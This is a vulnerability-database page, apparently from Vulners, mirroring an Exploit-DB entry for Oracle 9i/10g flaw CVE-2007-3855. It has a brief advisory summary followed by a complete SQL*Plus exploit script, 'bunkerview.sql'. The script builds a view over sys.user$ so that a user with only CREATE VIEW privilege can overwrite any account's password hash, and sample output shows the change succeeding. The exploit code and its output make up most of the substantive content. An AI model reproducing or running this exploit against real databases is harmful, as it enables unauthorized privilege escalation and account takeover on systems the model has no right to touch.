Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Oracle Database - SQL Compiler Views Unauthorized Manipulation

🗓️ 12 Jul 2007 00:00:00Reported by bunkerType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 40 Views

Oracle Database SQL Compiler Views Unauthorized Manipulatio

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Oracle 9i/10g evil views Change Passwords Exploit (CVE-2007-3855)
19 Jul 200700:00
zdt
Check Point Advisories		Oracle Database SQL Compiler Access Control Security Bypass (CVE-2007-3855)
27 Jun 201000:00
checkpoint_advisories
CVE		CVE-2007-3855
18 Jul 200719:00
cve
Cvelist		CVE-2007-3855
18 Jul 200719:00
cvelist
Exploit DB		Oracle 9i/10g - Evil Views Change Passwords
19 Jul 200700:00
exploitdb
exploitpack		Oracle 9i10g - Evil Views Change Passwords
19 Jul 200700:00
exploitpack
exploitpack		Oracle Database - SQL Compiler Views Unauthorized Manipulation
12 Jul 200700:00
exploitpack
NVD		CVE-2007-3855
18 Jul 200719:30
nvd
OpenVAS		Oracle Database Server Multiple Components Multiple Vulnerabilities
7 Dec 201100:00
openvas
Tenable Nessus		Oracle Database Multiple Vulnerabilities (July 2007 CPU)
16 Nov 201100:00
nessus
Rows per page
source: https://www.securityfocus.com/bid/24887/info

Oracle has released a Critical Patch Update advisory for July 2007 to address multiple vulnerabilities for supported releases. Earlier unsupported releases are likely to be affected by these issues as well.

The issues identified by the vendor affect all security properties of the Oracle products and present local and remote threats. Various levels of authorization are needed to leverage some of the issues, but other issues do not require any authorization. The most severe of the vulnerabilities could possibly expose affected computers to complete compromise. 

--
-- bunkerview.sql 
--
-- Oracle 9i/10g - evil view exploit (CVE-2007-3855)
-- Uses evil view to perform unauthorized password update
--
-- by Andrea "bunker" Purificato - http://rawlab.mindcreations.com
-- 37F1 A7A1 BB94 89DB A920  3105 9F74 7349 AF4C BFA2
--
-- This code should be used only for LEGAL purpose!
-- ...and remember: use Oracle at your own risk ;-)
--
-- Thanks to security researchers all around the world...
-- Smarties rules (they know what I mean)! ;-D
--
--
-- SQL> select * from user_sys_privs;
-- 
-- USERNAME                       PRIVILEGE                                ADM
-- ------------------------------ ---------------------------------------- ---
-- TEST                           CREATE VIEW                              NO
-- TEST                           CREATE SESSION                           NO
--
-- SQL> select password from sys.user$ where name='TEST';
--
-- PASSWORD
-- ------------------------------
-- AAAAAAAAAAAAAAAA
-- 
-- SQL> @bunkerview
-- [+] bunkerview.sql - Evil view exploit for Oracle 9i/10g (CVE-2007-3855)
-- [+] by Andrea "bunker" Purificato - http://rawlab.mindcreations.com
-- [+] 37F1 A7A1 BB94 89DB A920  3105 9F74 7349 AF4C BFA2
-- 
-- Target username (default TEST):
-- 
-- View created.
-- 
-- old   1:   update bunkerview set password='6D9FEAAB597EF01B' where name='&the_user'
-- new   1:   update bunkerview set password='6D9FEAAB597EF01B' where name='TEST'
-- 
-- 1 row updated.
-- 
-- 
-- View dropped.
-- 
-- 
-- Commit complete.
-- 
-- SQL> select password from sys.user$ where name='TEST';
-- 
-- PASSWORD
-- ------------------------------
-- 6D9FEAAB597EF01B
--
set serveroutput on;
prompt [+] bunkerview.sql - Evil view exploit for Oracle 9i/10g (CVE-2007-3855)
prompt [+] by Andrea "bunker" Purificato - http://rawlab.mindcreations.com
prompt [+] 37F1 A7A1 BB94 89DB A920  3105 9F74 7349 AF4C BFA2
prompt 
undefine the_user;
accept the_user char prompt 'Target username (default TEST): ' default 'TEST';
create or replace view bunkerview as 
  select x.name,x.password from sys.user$ x left outer join sys.user$ y on x.name=y.name;
  update bunkerview set password='6D9FEAAB597EF01B' where name='&the_user';
  drop view bunkerview;
commit;

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
12 Jul 2007 00:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 26.5
EPSS0.31494
oracle databasesql compilerunauthorized manipulationcritical patch updatejuly 2007vulnerabilitiesauthorizationlocal threatsremote threatscomplete compromisecve-2007-3855evil view exploitbunker purificatorawlab mindcreations
40